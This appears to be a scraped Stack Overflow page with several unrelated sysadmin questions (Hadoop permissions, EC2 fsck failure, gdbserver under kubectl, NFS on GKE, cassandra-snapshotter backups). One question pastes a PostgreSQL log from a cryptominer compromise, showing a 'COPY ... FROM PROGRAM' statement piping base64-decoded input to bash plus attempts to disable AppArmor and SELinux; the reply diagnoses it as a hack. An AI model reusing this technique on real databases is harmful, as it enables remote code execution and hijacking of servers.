If I try to start hadoop in my mac terminal then it will show operation not permitted - hadoop3

Starting namenodes on [localhost]
localhost: bash: /Users/gauravgadhave/Desktop/Bigdata_install/hadoop-3.2.2/bin/hdfs: Operation not permitted
Starting datanodes
localhost: bash: /Users/gauravgadhave/Desktop/Bigdata_install/hadoop-3.2.2/bin/hdfs: Operation not permitted

Related

Postgresql database server keeps shutting down randomly [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 1 year ago.
Improve this question
During last two days, it's been five or six times which my postgres database server was shut down unexpectedly, often when server traffic was at the lowest level.
So i checked postgresql log:
2021-09-18 10:17:36.099 GMT [22856] LOG: received smart shutdown request
2021-09-18 10:17:36.111 GMT [22856] LOG: background worker "logical replication launcher" (PID 22863) exited with exit code 1
grep: Trailing backslash
kill: (28): Operation not permitted
2021-09-18 10:17:39.601 GMT [55614] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.603 GMT [55622] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.686 GMT [55635] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.688 GMT [55636] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.718 GMT [55642] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.720 GMT [55643] XXX#XXX FATAL: the database system is shutting down
kill: (55736): No such process
kill: (55741): No such process
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Failed to stop c3pool_miner.service: Interactive authentication required.
See system logs and 'systemctl status c3pool_miner.service' for details.
pkill: killing pid 654 failed: Operation not permitted
pkill: killing pid 717 failed: Operation not permitted
pkill: killing pid 717 failed: Operation not permitted
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
bash: line 525: docker: command not found
bash: line 526: docker: command not found
bash: line 527: docker: command not found
bash: line 528: docker: command not found
bash: line 529: docker: command not found
bash: line 530: docker: command not found
bash: line 531: docker: command not found
bash: line 532: docker: command not found
bash: line 533: docker: command not found
bash: line 534: docker: command not found
bash: line 547: setenforce: command not found
bash: line 548: /etc/selinux/config: Permission denied
Failed to stop apparmor.service: Interactive authentication required.
See system logs and 'systemctl status apparmor.service' for details.
Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable apparmor
Failed to reload daemon: Interactive authentication required.
update-rc.d: error: Permission denied
Failed to stop aliyun.service.service: Interactive authentication required.
See system logs and 'systemctl status aliyun.service.service' for details.
Failed to disable unit: Interactive authentication required.
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
2021-09-18 10:17:49.860 GMT [54832] admin#postgres FATAL: terminating connection due to administrator command
2021-09-18 10:17:49.860 GMT [54832] admin#postgres CONTEXT: COPY uegplqsl, line 1: "/tmp/kinsing exists"
2021-09-18 10:17:49.860 GMT [54832] admin#postgres STATEMENT: DROP TABLE IF EXISTS XXX;CREATE TABLE XXX(cmd_output text);COPY XXXFROM PROGRAM 'echo ... |base64 -d|bash';SELECT * FROM XXX;DROP TABLE IF EXISTS XXX;
2021-09-18 10:17:49.877 GMT [22858] LOG: shutting down
2021-09-18 10:17:49.907 GMT [22856] LOG: database system is shut down
I learned it could be another process sending SIGTERM, SIGINT or SIGQUIT signals to database server. So i used systemtap to catch any signal for shutting down database server. After postgresql shut down again, i got this:
Now i have the PID of these processes which are sending shut down signals. What can i do to prevent this from happening again?
VPS operating system is Ubuntu 20.04.3 LTS. The backend is written in Django and database is Postgresql 12.
You have been hacked. Rebuild the system, and this time pick a good password for your superuser, and don't let anyone log on from the outside at all unless that is necessary, and if it is don't let them do so as the superuser.

aws ec2 ssh fails after creating an image of the instance

I regularly create an image of a running instance without stopping it first. That has worked for years without any issues. Tonight, I created another image of the instance (without any changes to the virtual server settings except for a "sudo yum update -y") and noticed my ssh session was closed. It looked like it was rebooted after the image was created. Then the web console showed 1/2 status checks passed. I rebooted it a few times and the status remained the same. The log showed:
Setting hostname localhost.localdomain: [ OK ]
Setting up Logical Volume Management: [ 3.756261] random: lvm: uninitialized urandom read (4 bytes read)
WARNING: Failed to connect to lvmetad. Falling back to device scanning.
[ OK ]
Checking filesystems
Checking all file systems.
[/sbin/fsck.ext4 (1) -- /] fsck.ext4 -a /dev/xvda1
/: clean, 437670/1048576 files, 3117833/4193787 blocks
[/sbin/fsck.xfs (1) -- /mnt/pgsql-data] fsck.xfs -a /dev/xvdf
[/sbin/fsck.ext2 (2) -- /mnt/couchbase] fsck.ext2 -a /dev/xvdg
/sbin/fsck.xfs: XFS file system.
fsck.ext2: Bad magic number in super-block while trying to open /dev/xvdg
/dev/xvdg:
The superblock could not be read or does not describe a valid ext2/ext3/ext4
[ 3.811304] random: crng init done
filesystem. If the device is valid and it really contains an ext2/ext3/ext4
filesystem (and not swap or ufs or something else), then the superblock
is corrupt, and you might try running e2fsck with an alternate superblock:
e2fsck -b 8193 <device>
or
e2fsck -b 32768 <device>
[FAILED]
*** An error occurred during the file system check.
*** Dropping you to a shell; the system will reboot
*** when you leave the shell.
/dev/fd/9: line 2: plymouth: command not found
Give root password for maintenance
(or type Control-D to continue):
It looked like /dev/xvdg failed the disk check. I detached the volume from the instance and reboot. I still couldn't ssh in. I re-attached it and rebooted. Now it says status check 2/2 passed but I still can't ssh back in and the log still showed issues with /dev/xvdg as above.
Any help would be appreciated. Thank you!
Thomas

Can't attach gdbserver to process through kubectl

It looks like I have some sort of permissions problem with kubectl. I have a Docker image, that contains server with native dynamic library + gdbserver. When I'm trying to debug Docker container running on my local machine all is fine. I'm using the following workflow:
start gdb
target remote | docker exec -i CONTAINER gdbserver - --attach PID
set sysroot /path/to/local/binary
Good to go!
But when I'm trying to do such operation with kubectl I'm getting the following error:
Cannot attach to lwp 7: Operation not permitted (1)
Exiting
Remote connection closed
The only difference is step 2:
target remote | kubectl exec -i POD -- gdbserver - --attach PID
I think you might need to add ptrace() capabilities and seccomm profile in your yaml file.
--cap-add sys_ptrace

Kernel error when trying to start an NFS server in a container

I was trying to run through the NFS example in the Kubernetes codebase on Container Engine, but I couldn't get the shares to mount. Turns out every time the nfs-server pod is launched, the kernel is throwing an error:
Apr 27 00:11:06 k8s-cluster-6-node-1 kernel: [60165.482242] ------------[ cut here ]------------
Apr 27 00:11:06 k8s-cluster-6-node-1 kernel: [60165.483060] WARNING: CPU: 0 PID: 7160 at /build/linux-50mAO0/linux-3.16.7-ckt4/fs/nfsd/nfs4recover.c:1195 nfsd4_umh_cltrack_init+0x4a/0x60 nfsd
Full output here: http://pastebin.com/qLzCFpAa
Any thoughts on how to solve this?
The NFS example doesn't work because GKE (by default) doesn't support running privileged containers, such as the nfs-server. I just tested this with a v0.16.0 cluster and kubectl v0.15.0 (the current gcloud default) and got a nice error message when I tried to start the nfs-server pod:
$ kubectl create -f nfs-server-pod.yaml
Error: Pod "nfs-server" is invalid: spec.containers[0].privileged: forbidden 'true'

How to take data backup using cassandra-snapshotter?

I have to take the data backup of my cassandra nodes and upload it to amazon AWS s3. When I execute the following command,
cassandra-snapshotter --aws-access-key-id=**** --aws-secret-access-key=**** --s3-bucket-name=inblox-exp-buck --s3-bucket-region=ap-southeast-2 --s3-base-path=test1 backup --hosts=52.64.45.152,52.64.28.145 --user=ubuntu
I get the following error,
[52.64.45.152] Executing task 'node_start_backup'
[52.64.28.145] Executing task 'node_start_backup'
Fatal error: Needed to prompt for a connection or sudo password (host: 52.64.28.145), but input would be ambiguous in parallel mode
Aborting.
Needed to prompt for a connection or sudo password (host: 52.64.28.145), but input would be ambiguous in parallel mode
Fatal error: Needed to prompt for a connection or sudo password (host: 52.64.45.152), but input would be ambiguous in parallel mode
Aborting.
Needed to prompt for a connection or sudo password (host: 52.64.45.152), but input would be ambiguous in parallel mode
Fatal error: One or more hosts failed while executing task 'node_start_backup'
Aborting.
[52.64.45.152] Executing task 'clear_node_snapshot'
[52.64.28.145] Executing task 'clear_node_snapshot'
[52.64.28.145] sudo: /usr/bin/nodetool clearsnapshot -t "20150416144918"
[52.64.45.152] sudo: /usr/bin/nodetool clearsnapshot -t "20150416144918"
Fatal error: Needed to prompt for a connection or sudo password (host: 52.64.28.145), but input would be ambiguous in parallel mode
Aborting.
Needed to prompt for a connection or sudo password (host: 52.64.28.145), but input would be ambiguous in parallel mode
Fatal error: Needed to prompt for a connection or sudo password (host: 52.64.45.152), but input would be ambiguous in parallel mode
Aborting.
Needed to prompt for a connection or sudo password (host: 52.64.45.152), but input would be ambiguous in parallel mode
Fatal error: One or more hosts failed while executing task 'clear_node_snapshot'
Aborting.
One or more hosts failed while executing task 'clear_node_snapshot'
What is happening here? How do I fix this problem ?
Cassandra-snapshotter does ssh to the host, so make sure you have your 'ubuntu' user's rsa-pub key listed in .ssh/authorized-keys file. Optionally, you can turn-off ssh option in code.
Only if the password is required to access the hosts,
same problem I found and I solved it by passing password as well
for help:
$cassandra-snapshotter backup -h
in your command should be like
cassandra-snapshotter --aws-access-key-id=**** --aws-secret-access-key=**** --s3-bucket-name=inblox-exp-buck --s3-bucket-region=ap-southeast-2 --s3-base-path=test1 backup --hosts=xx.xx.xx.xx,xx.xx.xx.xx --user=ubuntu --password=*****
I am able to take backup.
Setup
3 Node cluster
Separate machine that runs backup command
All are aws ec2 machines.
I have used below command.
cassandra-snapshotter --s3-bucket-name=BUCKET_NAME \
--s3-bucket-region=us-east-1 \
--s3-base-path=CLUSTER_BACKUP \
--aws-access-key-id=KEY \
--aws-secret-access-key=SECRET \
backup \
--hosts=PUBLIC_IP_1,PUBLIC_IP_2,PUBLIC_IP_3 \
--sshkey=YOUR_PEM_FILE.pem